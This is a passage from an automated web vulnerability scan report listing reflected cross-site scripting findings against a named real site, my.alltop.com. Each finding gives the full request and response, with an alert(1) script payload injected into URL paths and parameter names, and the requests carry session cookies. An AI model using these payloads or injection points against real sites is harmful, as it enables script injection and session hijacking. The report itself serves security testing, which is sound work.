Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p/%22ns=%22netsparker(0x0001EE)?8b2b2"><script>alert(1)</script>e7c4c41d0bd=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.198. http://my.alltop.com/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ab05"><script>alert(1)</script>cc3e70f6981 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p8ab05"><script>alert(1)</script>cc3e70f6981/%2522ns%253D%2522netsparker%25280x000204%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p8ab05"><script>alert(1)</script>cc3e70f6981/%2522ns%253D%2522netsparker%25280x000204%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.199. http://my.alltop.com/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload befa5"><script>alert(1)</script>c6fcddd9845 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)befa5"><script>alert(1)</script>c6fcddd9845 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:15 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:15 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)befa5"><script>alert(1)</script>c6fcddd9845" method="post" accept-charset="utf-8">
...[SNIP]...

1.200. http://my.alltop.com/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 220d0"><script>alert(1)</script>1a1cd672f6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)?220d0"><script>alert(1)</script>1a1cd672f6a=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)?220d0"><script>alert(1)</script>1a1cd672f6a=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.201. http://my.alltop.com/alpha/q [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/q

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3fbf"><script>alert(1)</script>13c7c27296e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/qb3fbf"><script>alert(1)</script>13c7c27296e HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/qb3fbf"><script>alert(1)</script>13c7c27296e" method="post" accept-charset="utf-8">
...[SNIP]...

1.202. http://my.alltop.com/alpha/q [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/q

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a05e"><script>alert(1)</script>665b69d2b17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/q?4a05e"><script>alert(1)</script>665b69d2b17=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/q?4a05e"><script>alert(1)</script>665b69d2b17=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.203. http://my.alltop.com/alpha/r [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/r

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae528"><script>alert(1)</script>546c08a0223 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/rae528"><script>alert(1)</script>546c08a0223 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:54 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/rae528"><script>alert(1)</script>546c08a0223" method="post" accept-charset="utf-8">
...[SNIP]...

1.204. http://my.alltop.com/alpha/r [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d304"><script>alert(1)</script>d9fb1424a9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/r?4d304"><script>alert(1)</script>d9fb1424a9a=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/r?4d304"><script>alert(1)</script>d9fb1424a9a=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.205. http://my.alltop.com/alpha/s [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/s

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 352f7"><script>alert(1)</script>51c307c634d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/s352f7"><script>alert(1)</script>51c307c634d HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:56 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/s352f7"><script>alert(1)</script>51c307c634d" method="post" accept-charset="utf-8">
...[SNIP]...

1.206. http://my.alltop.com/alpha/s [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/s

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24241"><script>alert(1)</script>ad68c4627bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/s?24241"><script>alert(1)</script>ad68c4627bb=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/s?24241"><script>alert(1)</script>ad68c4627bb=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.207. http://my.alltop.com/alpha/t ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t

Issue detail

The value of the '"--></style></script><script>netsparker(0x000222)</script> request parameter is copied into the HTML document as plain text between tags. The payload de688<script>alert(1)</script>8612f734538 was submitted in the '"--></style></script><script>netsparker(0x000222)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t?'"--></style></script><script>netsparker(0x000222)</script>de688<script>alert(1)</script>8612f734538 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
